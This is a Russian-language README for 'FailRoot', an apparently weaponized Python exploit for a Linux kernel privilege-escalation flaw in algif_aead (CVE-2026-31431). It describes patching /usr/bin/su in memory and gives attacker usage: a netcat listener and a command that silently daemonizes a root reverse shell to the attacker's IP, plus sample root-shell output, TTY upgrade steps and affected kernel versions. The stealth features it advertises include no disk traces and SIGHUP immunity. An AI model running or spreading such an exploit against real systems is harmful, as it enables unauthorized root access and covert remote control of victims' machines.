
Оружиезированный Python-эксплойт для CVE-2026-31431, объединяющий повышение привилегий в ядре Linux с демонизированным root reverse shell с полным PTY, патчингом /usr/bin/su в памяти.
█▀▀ ▄▀█ █ █ █▀█ █▀█ █▀█ ▀█▀
█▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░
CVE-2026-31431 • Linux Kernel LPE → Root Reverse Shell
FailRoot — это боевой эксплойт для CVE-2026-31431 — записи за пределами буфера в подсистеме crypto: algif_aead ядра Linux.
Он объединяет повышение привилегий с демонизированным root reverse shell с полным PTY:
AF_ALG + splice() → 4-байтовая запись в page cache → патч /usr/bin/su → root
Весь эксплойт помещается в один файл. Без компиляции. Без внешних зависимостей. Без следов на диске — бинарник su патчится только в памяти.
algif_aead + authencesn через несколько запасных стратегий/usr/bin/supty.spawn("/usr/bin/su") → полностью интерактивный root TTYReverse shell переживает закрытие терминала (игнорирует SIGHUP), не выводит ничего на целевой машине и подключается с повторами до 3 минут.
# Атакующий — запустить слушатель:
nc -lvnp 4444
# Цель — запустить эксплойт (ничего не отобразится, он мгновенно демонизируется):
python3 exploit.py <IP_АТАКУЮЩЕГО> 4444
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234
root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash
| От | До (не включительно) |
|---|---|
| 4.14 | 5.10.254 |
| 5.11 | 5.15.204 |
| 5.16 | 6.1.170 |
| 6.2 | 6.6.137 |
| 6.7 | 6.12.85 |
| 6.13 | 6.18.22 |
| 6.19 | 6.19.12 |
| 7.0 | rc1–rc6 |
os.splice())/usr/bin/su (доступен для чтения всем на всех дистрибутивах)algif_aead и authencesn доступныsudo не требуетсяТолько для авторизованных исследований в области безопасности и образовательных целей. Неправомерное использование незаконно.